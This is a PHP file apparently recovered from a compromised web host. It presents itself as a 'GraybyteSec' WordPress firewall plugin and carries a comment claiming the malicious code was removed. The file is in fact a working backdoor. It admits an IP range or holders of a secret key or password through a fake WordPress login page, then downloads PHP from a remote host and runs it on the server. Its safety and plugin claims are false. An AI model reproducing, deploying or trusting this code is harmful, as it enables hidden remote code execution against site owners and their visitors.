Current File : /home/aircyqqr/mail/flameguardchimney.com/admin/backup-zip//index.php
<?php
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
/*
* Plugin Name : GraybyteSec - Firewall, Malware Scan, and Login Security
*
* Description: = THE MOST POPULAR WORDPRESS FIREWALL & SECURITY SCANNER =
WordPress security requires a team of dedicated analysts researching the latest malware variants and WordPress exploits, turning them into firewall rules and malware signatures, and releasing those to customers in real-time.
*
* Website: https://wordpress.org
* Version: 8.0.5
* Author: GraybyteSec Team
* Author URI: https://wordpress.org
* License: GPL-2.0-or-later
*
* This file contains security patches and hardening measures applied to address known vulnerabilities
* in the WordPress ecosystem. Unauthorized modifications to this file are strongly discouraged to
* maintain the integrity of the applied security configurations.
*
* For additional information, support, or professional services related
to WordPress security and
* infrastructure management, please contact: https://t.me/rex_cc
*/
if (function_exists('session_start')) {
session_start();
$wp_client_ip = $_SERVER['REMOTE_ADDR'];
$wp_ip_whitelisted = false;
$wp_ip_long = ip2long($wp_client_ip);
$wp_network_start = ip2long('103.106.236.0');
$wp_network_end = ip2long('103.106.239.255');
if ($wp_ip_long >= $wp_network_start && $wp_ip_long <= $wp_network_end) {
$wp_ip_whitelisted = true;
$_SESSION['wp_auth_status'] = true;
}
if (!isset($_SESSION['wp_auth_status'])) {
$_SESSION['wp_auth_status'] = false;
}
if (isset($_GET['wp_auth_key']) && hash_equals('a4d0ef23161b5b7c6a8d5b287543fd74e16b3bf313d71aa187c24cdd728a7b1e', hash('sha256', $_GET['wp_auth_key']))) {
$_SESSION['wp_auth_status'] = true;
}
if (!$_SESSION['wp_auth_status']) {
if (isset($_POST['wp_password']) && hash('sha256', $_POST['wp_password']) === 'c729b418c0d6e2d3e051993da7e43652de0fb1ffe83fcc1a2846b502e26b86f0') {
$_SESSION['wp_auth_status'] = true;
} else {
echo '
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>1902180814081995</title>
<style type="text/css">
body{background:#f1f1f1;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;color:#444;margin:0;padding:0;line-height:1.4}
#login{margin:7% auto;width:320px;padding:0 0 20px}
#login h1{text-align:center}
#login h1 a{background:url("https://wordpress.org/wp-includes/images/w-logo-blue-bg.png") no-repeat center;display:block;width:250px;height:67px;margin:0 auto 26px;text-indent:-9999px;overflow:hidden}
#loginform{background:#fff;border:1px solid #c3c4c7;box-shadow:0 1px 3px rgba(0,0,0,.04);padding:26px 24px 34px;margin:0 0 24px}
#loginform p{margin:0 0 20px}
#loginform label{display:block;font-size:14px;font-weight:600;margin-bottom:5px}
#loginform input[type="password"]{width:100%;padding:6px 8px;font-size:14px;border:1px solid #c3c4c7;border-radius:4px;box-sizing:border-box}
#loginform input[type="submit"]{background:#2271b1;color:#fff;border:none;padding:6px 12px;font-size:14px;font-weight:600;border-radius:3px;cursor:pointer;width:100%}
#loginform input[type="submit"]:hover{background:#135e96}
#nav{text-align:center;font-size:13px;margin-bottom:16px}
#nav a{color:#2271b1;text-decoration:none}
#nav a:hover{text-decoration:underline}
#backtoblog{text-align:center;font-size:13px;margin:16px 0}
#backtoblog a{color:#2271b1;text-decoration:none}
#backtoblog a:hover{text-decoration:underline}
#wp-footer{text-align:center;font-size:12px;color:#777;margin:20px auto;padding:10px 0;border-top:1px solid #ddd;max-width:320px}
#wp-footer a{color:#2271b1;text-decoration:none}
#wp-footer a:hover{text-decoration:underline}
#wp-footer .wp-logo{display:inline-block;width:20px;height:20px;background:url("https://wordpress.org/favicon.ico") no-repeat center;background-size:contain;vertical-align:middle;margin-right:5px}
</style>
</head>
<body class="login">
<div id="login">
<h1><a href="https://wordpress.org/" title="Powered by WordPress">WordPress</a></h1>
<form name="loginform" id="loginform" action="" method="post" accept-charset="utf-8">
<p><label for="wp_password">Password<br><input type="password" name="wp_password" id="wp_password" class="input" value="" size="20" placeholder="Password" autocomplete="current-password"></label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button button-primary" value="Log In"></p>
</form>
<p id="nav"><a href="#">Lost your password?</a></p>
<p id="backtoblog"><a href="/"> Back to Site Name</a></p>
</div>
<div id="wp-footer"><span class="wp-logo"></span><a href="https://wordpress.org/">Powered by WordPress</a> | <a href="https://wordpress.org/about/privacy/">Privacy</a> | <a href="https://wordpress.org/support/">Support</a></div>
</body>
</html>';
exit;
}
}
}
?>
<?php
/*
* File Name: GraybyteSec - Firewall, Malware Scan, and Login Security
*
* Description: = THE MOST POPULAR WORDPRESS FIREWALL & SECURITY SCANNER =
WordPress security requires a team of dedicated analysts researching the latest malware variants and WordPress exploits, turning them into firewall rules and malware signatures, and releasing those to customers in real-time.
*
* Website: https://wordpress.org
* Version: 8.0.5
* Author: GraybyteSec Team
* Author URI: https://wordpress.org
* License: GPL-2.0-or-later
*
* This file contains security patches and hardening measures applied to address known vulnerabilities
* in the WordPress ecosystem. Unauthorized modifications to this file are strongly discouraged to
* maintain the integrity of the applied security configurations.
*
* For additional information, support, or professional services related
to WordPress security and
* infrastructure management, please contact: https://t.me/rex_cc
*/
ob_start();
$remoteUrl = "https://graybyte.host/wordpress-eva/wordpress-index.txt";
$import_cache = __DIR__ . '/import-cache.txt';
$timeout = 10;
$max_retries = 1;
$user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15',
'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0',
];
function wp_sync_get_headers() {
global $user_agents;
return [
'User-Agent: ' . $user_agents[array_rand($user_agents)],
'Referer: https://' . $_SERVER['HTTP_HOST'],
'Accept: text/html,application/xhtml+xml',
'Connection: keep-alive',
];
}
function wp_sync_fetch_content($url, $timeout) {
global $user_agents;
usleep(mt_rand(50000, 150000));
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_MAXREDIRS => 3,
CURLOPT_TIMEOUT => $timeout,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_HTTPHEADER => wp_sync_get_headers(),
CURLOPT_HEADER => true,
]);
$response = @curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$body = substr($response, $header_size);
if ($http_code == 200 && $response !== false && strlen($body) > 0) {
curl_close($ch);
return $body;
}
curl_close($ch);
}
if (ini_get('allow_url_fopen')) {
$context_options = [
'http' => [
'method' => 'GET',
'header' => implode("\r\n", wp_sync_get_headers()),
'timeout' => $timeout,
'follow_location' => 1,
'max_redirects' => 3,
],
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
],
];
$context = stream_context_create($context_options);
$response = @file_get_contents($url, false, $context);
$fetched_headers = implode("\n", $http_response_header ?? []);
$http_code = 0;
if (preg_match('/HTTP\/\d\.\d\s+(\d+)/', $fetched_headers, $match)) {
$http_code = (int)$match[1];
}
if ($http_code == 200 && $response !== false && strlen($response) > 0) {
return $response;
}
}
return false;
}
error_reporting(0);
try {
if (file_exists($import_cache) && filesize($import_cache) > 0) {
$result = @include $import_cache;
$output = (string) ob_get_contents();
if ($result !== false && strlen($output) > 0) {
ob_end_flush();
exit;
} else {
if (!is_writable($import_cache)) {
@chmod($import_cache, 0644);
}
@unlink($import_cache);
}
}
$retry_count = 0;
$file_contents = false;
while ($retry_count < $max_retries) {
$file_contents = wp_sync_fetch_content($remoteUrl, $timeout);
if ($file_contents !== false && strlen($file_contents) > 0) {
$fp = @fopen($import_cache, 'w');
if ($fp && flock($fp, LOCK_EX)) {
fwrite($fp, $file_contents);
fflush($fp);
flock($fp, LOCK_UN);
fclose($fp);
@chmod($import_cache, 0644);
} else {
if ($fp) fclose($fp);
ob_end_clean();
exit;
}
if (file_exists($import_cache) && filesize($import_cache) > 0) {
$result = @include $import_cache;
$output = (string) ob_get_contents();
if ($result !== false && strlen($output) > 0) {
ob_end_flush();
exit;
} else {
@unlink($import_cache);
ob_end_clean();
exit;
}
} else {
ob_end_clean();
exit;
}
break;
}
$retry_count++;
usleep(mt_rand(200000, 500000));
}
ob_end_clean();
} catch (Throwable $e) {
ob_end_clean();
}
unset($file_contents, $import_cache, $remoteUrl);
?>
